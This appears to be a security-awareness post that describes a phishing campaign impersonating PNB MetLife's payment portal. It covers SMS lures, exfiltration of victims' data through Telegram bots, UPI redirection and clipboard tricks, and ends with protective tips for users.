A recently uncovered phishing campaign targeting PNB MetLife insurance customers shows how far financial fraud has evolved. What looks like a simple premium payment reminder can quickly turn into a real-money loss using legitimate UPI apps many of us trust every day.
Overview of the Phishing Campaign
This campaign impersonates PNB MetLife's premium payment system. Victims are led to fake payment gateways that closely resemble legitimate insurance portals.
Unlike traditional phishing attacks that aim only to steal credentials, this operation follows a multi-stage approach:
- Collect personal details
- Build trust through a realistic payment flow
- Redirect victims to real UPI apps
- In advanced cases, harvest full banking credentials
This layered design makes the attack both effective and difficult to detect early.
How Victims Are Lured In
The attack usually begins with a simple SMS message.
These messages appear transactional rather than alarming. Common themes include:
- Premium payment pending
- Policy update required
- Refund or adjustment notification
The language is calm but time-sensitive, encouraging users to "complete payment" or "resolve the issue" through a provided link.
While SMS is the primary channel, similar links may also circulate through email or social media platforms, increasing exposure.
The Fake PNB MetLife Payment Gateway
Clicking the link opens a professionally designed, mobile-friendly payment page. At first glance, nothing feels wrong. The layout is clean, branding looks familiar and the flow resembles genuine insurance payment portals.
The page asks for:
- Name
- Policy number
- Mobile number
Here's the critical detail: There is no backend verification.
Any value entered is accepted. This is deliberate. Validation failures could raise suspicion, while smooth acceptance keeps the victim moving forward with confidence.
Stealthy Data Exfiltration in the Background
While the victim sees a normal form submission, something else is happening silently.
The entered details are instantly transmitted to attackers using Telegram's Bot API. Instead of reaching a payment processor or insurance backend, the data is routed to attacker-controlled Telegram channels.
Information collected at this stage includes:
- Personal identifiers
- Policy details
- Contact information
Telegram is attractive to attackers because it offers speed, automation and relative anonymity, all without complex infrastructure.
Manipulating the Payment Flow
Once initial details are captured, the page advances to a payment step.
Victims are asked to:
- Enter a payment amount
- Proceed to finalize the transaction
Again, no policy validation occurs. Any amount is accepted and logged.
This gradual progression is intentional. Each step feels legitimate on its own, but together they guide the victim toward a fraudulent outcome without triggering alarm.
The UPI Redirection Trap
This is where the attack becomes especially effective. Instead of routing payments through fake processors, the scam leverages real UPI applications, including:
- PhonePe
- Paytm
- Google Pay
The phishing page dynamically generates a UPI payment request and presents it as:
- A QR code
- App-specific payment buttons
Because the payment happens inside a genuine app, many users assume it must be safe. Unfortunately, the funds are sent directly to attacker-controlled UPI IDs.
Clipboard Abuse
Some variants include an additional layer of deception. When a user clicks a payment app button, the site silently copies the attacker's UPI ID to the device clipboard before redirecting to the UPI app.
Even if the victim ignores the QR code, the fraudulent payment details are already prepared, increasing the likelihood of a successful transaction. It's subtle, efficient and difficult for most users to notice.
Beyond Payment Fraud
More sophisticated versions of this campaign go further. Victims may see options such as:
- Update Amount
- Refund Your Amount
- Add AutoDebit System
Selecting these paths eventually leads to pages requesting:
- Bank account numbers
- Debit card details
- Expiry dates and CVV codes
At this point, the operation shifts from payment fraud to full-scale financial identity theft, with all data still being exfiltrated through Telegram.
Infrastructure Behind the Scam
Threat research shows that attackers host these fake pages on free hosting platforms, allowing them to:
- Deploy quickly
- Rotate domains frequently
- Minimize operational costs
Multiple Telegram bots and operator accounts coordinate the data collection and monitoring, reflecting a level of organization rather than opportunistic fraud.
Why This Campaign Is Dangerous
Several factors make this threat stand out:
- It exploits trust in a well-known insurance brand
- It avoids obvious errors that usually expose phishing
- It uses legitimate UPI apps instead of fake ones
- It combines data theft, payment fraud, and credential harvesting
- It relies on psychological pacing rather than fear-based pressure
The result is a scam that feels routine until real money is lost.
How Users Can Protect Themselves
A few practical habits can significantly reduce risk:
- Avoid payment links received via SMS
- Access insurance portals only through official apps or saved bookmarks
- Be cautious of payment pages that accept any input without validation
- Never share card or bank details on ad-hoc payment pages
- Pause when urgency feels artificial
A moment of verification can prevent long-term damage.
Conclusion
This campaign is a reminder that modern fraud doesn't rely on fear alone. It relies on familiarity, convenience and trust.
As digital payments become smoother, scams will continue to blend into everyday experiences. Awareness is the best defense.
Reference article: https://malwr-analysis.com/2026/01/21/fake-pnb-metlife-payment-gateway-page-stealing-customer-details-and-redirecting-victims-to-upi-payments/
Stay One Step Ahead of Cybercriminals!
๐น The best defense is staying informed and proactive!
๐น Follow me for more insights on the latest cyber threats, attack trends and security best practices.
๐ Let's connect and fortify our digital world together!